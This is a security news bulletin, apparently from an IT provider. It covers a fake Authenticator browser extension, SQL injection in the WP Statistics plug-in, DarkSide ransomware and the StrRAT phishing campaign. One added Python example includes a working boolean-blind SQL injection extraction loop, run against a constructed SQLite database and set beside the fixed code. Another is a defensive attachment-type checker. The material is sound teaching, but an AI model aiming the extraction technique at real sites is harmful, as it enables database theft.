Neu Cyber Threats – 27th May 2021
Users of the Google Chrome web browser need to be wary when installing extensions from the Chrome Web Store, as it has been reported that a fake Chrome add-on claiming to be “Microsoft Authenticator” was available there. Hundreds of people have already downloaded the extension believing it to be a legitimate add-on, but in doing so have exposed their information to cyber criminals.
To make matters worse, the extension uses both the name and branding of the legitimate Microsoft Authenticator app, managed to get past Google’s review process, and even accrued a rating of three out of five stars, which makes it look all the more legitimate.
Close inspection of the extension’s entry in the Chrome Web Store would, in an ideal world, have raised suspicions amongst potential downloaders: the add-on claimed to have been uploaded by “Extensions” rather than the “Microsoft Corporation” you would normally expect, and contact details pointed to a Gmail account, rather than Microsoft’s own domain.
A further look at the reviews of the extension would have also raised alarm, as some of them warned anyone considering downloading the extension of the danger, whereas other reviewers, presumably fake, were full of praise for it.
Users who installed the extension were directed to a Polish webpage, which automatically redirected to a further page asking them to sign in or create an account.
Google has since removed the extension from the Chrome Web Store, but this is a type of threat that web users should be alert to. It is thought that the hundreds of people affected may have handed over access to their corporate networks, if they did fill out the phishing page with their account details.
As users become more aware of multi-factor authentication (MFA) and its many, many benefits, it is important to remember to always double check any applications or extensions to your browser that you download. It could just be the case that they aren’t what they seem.
A vulnerability in a WordPress plug-in is allowing cyber criminals to steal database information without even being logged in to the website. WP Statistics, a plug-in installed on over half a million WordPress websites, has a security flaw that could let unauthenticated site visitors extract sensitive information from the site’s database, including email addresses, credit-card data, passwords and more.
WP Statistics is a plug-in that delivers analytics for site owners, including how many people visit the site, where they’re coming from, what browsers and search engines they use, and which pages, categories and tags have the most visits. It also delivers anonymised data around IP addresses, referring sites, and country- and city-level details for visitors, presented in charts and graphs.
Researchers found the high-severity bug in the “Pages” function, which lets administrators see which pages have received the most traffic. The function builds its database query from request input that is not properly validated, so unauthenticated attackers can inject their own SQL into it and pull sensitive information out of the database.
Exfiltrating information this way would be a relatively slow process, because the flaw does not hand query results back directly, but high-value data such as user email addresses, passwords and encryption keys could still be extracted in a matter of hours with the help of automated tools. In a targeted attack, the vulnerability could be used to pull personally identifiable information from e-commerce sites holding customer records.
Neuways advises WordPress site owners to update the WP Statistics plug-in to the patched version that was recently issued. This kind of vulnerability also underscores the importance of having a web application firewall, whether at the network edge or as an endpoint firewall on the site itself, in place wherever sensitive data is stored, so that injection attempts are blocked before they reach the database. Otherwise your business could be subject to a data breach, with not only data lost but monetary loss too, in the form of fines from the Information Commissioner’s Office if any GDPR rules are found to have been broken.
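The following is an added example, not WP Statistics’ code or the researchers’ proof of concept. It models the class of flaw described above in Python against an in-memory SQLite database with made-up table names (`pages`, `users`) and data: a report function that pastes a request parameter straight into its SQL, the same function with a validated, bound parameter, and a boolean-blind extraction loop that recovers a user’s email address from the vulnerable version one character at a time while counting the queries it needs. The same payload is rejected by the fixed version before any SQL runs.

```python
import sqlite3

# Constructed schema and data; the table and column names are made up for this example.
def build_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, uri TEXT, hits INTEGER);
        CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pass_hash TEXT);
        INSERT INTO pages VALUES (1, '/', 120), (2, '/about', 45), (3, '/shop', 80);
        INSERT INTO users VALUES (1, 'admin@example.test', '$P$not-a-real-hash');
    """)
    return con

def pages_report_vulnerable(con, page_id):
    """Vulnerable: the request parameter is pasted straight into the SQL text."""
    sql = f"SELECT uri, hits FROM pages WHERE id = {page_id}"
    return con.execute(sql).fetchall()

def pages_report_fixed(con, page_id):
    """Fixed: the value is validated as an integer and bound as a parameter."""
    return con.execute("SELECT uri, hits FROM pages WHERE id = ?",
                       (int(page_id),)).fetchall()

def blind_extract(report, column, max_len=64):
    """Boolean-blind extraction of users.<column> for user id 1.

    The only feedback is whether the report returns a row, so every query
    answers a single yes/no question. Returns (recovered_value, query_count).
    """
    queries = 0

    def oracle(condition):
        nonlocal queries
        queries += 1
        # "1 AND (...)" keeps the row for page 1 only when the condition holds.
        return len(report(f"1 AND ({condition})")) > 0

    # Step 1: learn the length of the secret.
    length = 0
    for n in range(1, max_len + 1):
        if oracle(f"(SELECT length({column}) FROM users WHERE id = 1) = {n}"):
            length = n
            break

    # Step 2: binary-search each character over printable ASCII.
    recovered = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr((SELECT {column} FROM users WHERE id = 1), "
                      f"{pos}, 1)) <= {mid}"):
                hi = mid
            else:
                lo = mid + 1
        recovered += chr(lo)
    return recovered, queries

def demo():
    con = build_db()
    leaked, queries = blind_extract(lambda p: pages_report_vulnerable(con, p), "email")
    try:
        blind_extract(lambda p: pages_report_fixed(con, p), "email")
        fixed_rejects_payload = False
    except ValueError:      # int("1 AND (...)") fails before any SQL is executed
        fixed_rejects_payload = True
    return {"leaked": leaked, "queries": queries,
            "fixed_rejects_payload": fixed_rejects_payload}

if __name__ == "__main__":
    print(demo())
```

The query count is the point of the exercise: even a short email address costs well over a hundred round trips, which is why the advisory calls exfiltration slow, and also why it is trivially automated. Note that the fix is not a blocklist of keywords but a type check plus a bound parameter, so the database never sees attacker-controlled SQL text at all.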
The DarkSide ransomware group is continuing to make its mark on businesses around the world. Recently responsible for the Colonial Pipeline attack in the USA, which curtailed fuel supplies along the country’s East Coast, the group has struck again, this time affecting European subsidiaries of Toshiba.
Some of Toshiba’s networks were shut down as a result, demonstrating how effective ransomware attacks can be at cutting off revenue for businesses of all sizes. While it appears that no customer-related information has been leaked externally, it remains possible that the group could have leaked some of the data it took on the Dark Web.
If a malicious actor has access to a network and can encrypt business-essential data, they can cripple the company’s daily operations: the resulting downtime means a large loss of revenue, and ransomware attacks have proven difficult to recover from. At Neuways we advise every business, regardless of size, to have a multi-layered Business Continuity & Disaster Recovery plan in place, so that in the event of a ransomware attack the business can fall back on regular backups (with tested restores) to remain operational rather than suffering long periods of inactivity. Alongside backups, the following controls reduce the chance of an attack succeeding in the first place:
- A strong password policy: enforce minimum length and complexity, keep a password history so old passwords cannot be recycled, do not reuse passwords across services, and consider a password manager.
- Keep systems patched with the latest security updates.
- Ensure services such as RDP are not exposed directly to the internet; put remote access behind a VPN or gateway instead.
- Install endpoint protection that stops malicious scripts from running both on disk and in memory.
Microsoft researchers have found an email phishing campaign delivering a Java-based remote access trojan (RAT) that can steal credentials and take control of systems, while also posing as ransomware.
StrRAT is a Java-based remote access tool that steals browser credentials, logs keystrokes and gives the attacker remote control of infected systems, all typical RAT behaviour. It also has a module that downloads additional payloads onto the infected machine on command from its command-and-control (C2) server.
To make matters worse, StrRAT also has a feature uncommon in this type of malware: a ransomware encryption/decryption module. This module renames files in a way that suggests encryption is about to follow. However, the malware stops short of that step: it merely appends an extra extension to the file names without actually encrypting the contents. Why it behaves this way is not yet known.
Cyber criminals launch the campaign by using compromised email accounts to send several different phishing emails. Some of the messages use the subject line “Outgoing Payments.”, while others refer to a specific payment supposedly made by the “Accounts Payable Department”. These are just some of the many lures built around payment receipts from senders the recipient recognises, designed to encourage victims to open an attached file that appears to be a PDF but is in fact malicious.
The attached file in all these cases is not a PDF at all; opening it connects the system to a malicious domain to download the StrRAT malware, which then connects to an external controlling server.
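The mismatch between what an attachment claims to be and what its bytes actually are is something a mail gateway or a script over a mailbox export can check mechanically. The block below is an added example, not Microsoft’s analysis code or anything from the campaign itself: it builds a constructed message with the “Outgoing Payments.” subject carrying two attachments, one a genuine PDF header and one a ZIP/JAR archive named `invoice.pdf` (the archive stands in for a non-PDF payload; nothing here reproduces the real lure), then parses the message with Python’s standard `email` package and flags any attachment that is labelled PDF but does not start with the `%PDF-` signature.

```python
import email
from email import policy
from email.message import EmailMessage

# Magic bytes for a few common file types: what the file actually is.
SIGNATURES = {
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip/jar/office",
    b"MZ": "pe-executable",
    b"\x89PNG": "png",
}

def sniff(data):
    """Return a type name from the leading bytes, or 'unknown'."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return "unknown"

def claims_pdf(part):
    """True if the declared MIME type or the file name says this is a PDF."""
    name = (part.get_filename() or "").lower()
    return part.get_content_type() == "application/pdf" or name.endswith(".pdf")

def suspicious_attachments(raw_message):
    """Parse a raw RFC 5322 message and return (filename, actual_type) for every
    attachment that claims to be a PDF but whose bytes say otherwise."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        actual = sniff(data)
        if claims_pdf(part) and actual != "pdf":
            findings.append((part.get_filename(), actual))
    return findings

def build_sample():
    """Constructed sample message for the example; not a real campaign email."""
    msg = EmailMessage()
    msg["Subject"] = "Outgoing Payments."
    msg["From"] = "accounts@supplier.example"
    msg["To"] = "finance@victim.example"
    msg.set_content("Please find attached the remittance advice.")
    # A file that really is a PDF (header only, enough for the check) ...
    msg.add_attachment(b"%PDF-1.4\n%...", maintype="application",
                       subtype="pdf", filename="remittance.pdf")
    # ... and a ZIP/JAR archive wearing a .pdf name and a PDF content type.
    msg.add_attachment(b"PK\x03\x04" + b"\x00" * 26, maintype="application",
                       subtype="pdf", filename="invoice.pdf")
    return msg.as_bytes()

if __name__ == "__main__":
    for filename, actual in suspicious_attachments(build_sample()):
        print(f"{filename}: declared PDF, content looks like {actual}")
```

The check deliberately ignores the sender and the subject line: in this campaign the emails came from compromised accounts with plausible business subjects, so those fields would pass a reputation filter. Content sniffing catches the thing the attacker cannot fake without breaking the payload, namely the first bytes of the file.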
Neuways advises businesses to stay alert when dealing with any suspicious-looking incoming emails. Look for poor grammar, an unrecognised sender and demands for urgent action, and do not click a hyperlink or open an attachment unless you are expecting that communication. Bear in mind that a familiar sender address is not proof on its own: in this campaign the emails were sent from compromised, otherwise legitimate accounts.